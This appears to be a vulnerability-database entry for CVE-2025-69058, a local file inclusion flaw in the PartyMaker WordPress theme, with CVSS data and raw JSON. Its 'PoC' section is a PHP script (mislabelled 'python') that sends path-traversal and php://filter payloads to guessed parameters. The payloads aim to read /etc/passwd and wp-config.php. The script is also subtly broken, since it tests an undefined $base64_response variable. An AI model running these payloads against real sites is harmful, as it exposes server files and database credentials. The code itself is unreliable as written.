Security Vulnerability Report
中文
CVE-2025-69058 CVSS 8.1 HIGH

CVE-2025-69058

Published: 2026-01-22 17:16:20
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes PartyMaker partymaker allows PHP Local File Inclusion.This issue affects PartyMaker: from n/a through <= 1.1.15.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PartyMaker <= 1.1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-69058 PoC - PartyMaker Theme Local File Inclusion * Target: WordPress PartyMaker Theme <= 1.1.15 * Vulnerability: Local File Inclusion via unsafe include/require * Author: Security Researcher * Usage: Modify TARGET_URL and run with PHP */ $target_url = 'http://target-site.com/wp-content/themes/partymaker/'; // Common vulnerable parameters to test $vulnerable_params = [ 'file', 'page', 'template', 'include', 'action', 'load', 'view' ]; // Payloads for LFI testing $payloads = [ '../../../../../../etc/passwd', '../../../../../../wp-config.php', '../../../../../../../../etc/passwd', 'php://filter/convert.base64-encode/resource=../wp-config.php' ]; echo "[*] CVE-2025-69058 PoC - PartyMaker LFI\n"; echo "[*] Target: $target_url\n"; foreach ($vulnerable_params as $param) { foreach ($payloads as $payload) { $test_url = $target_url . '?' . $param . '=' . urlencode($payload); echo "[+] Testing: $test_url\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $test_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && (strpos($response, 'root:') !== false || strpos($response, 'DB_NAME') !== false || strpos($base64_response, 'PD9waHA') !== false)) { echo "[!] VULNERABLE! File inclusion confirmed\n"; echo "[+] Response length: " . strlen($response) . " bytes\n"; } } } echo "[*] Scan complete\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69058", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:19.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes PartyMaker partymaker allows PHP Local File Inclusion.This issue affects PartyMaker: from n/a through <= 1.1.15."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en un programa PHP (vulnerabilidad de 'inclusión remota de ficheros PHP') en AncoraThemes PartyMaker partymaker permite la inclusión local de ficheros PHP. Este problema afecta a PartyMaker: desde n/a hasta &lt;= 1.1.15."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/partymaker/vulnerability/wordpress-partymaker-theme-1-1-15-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}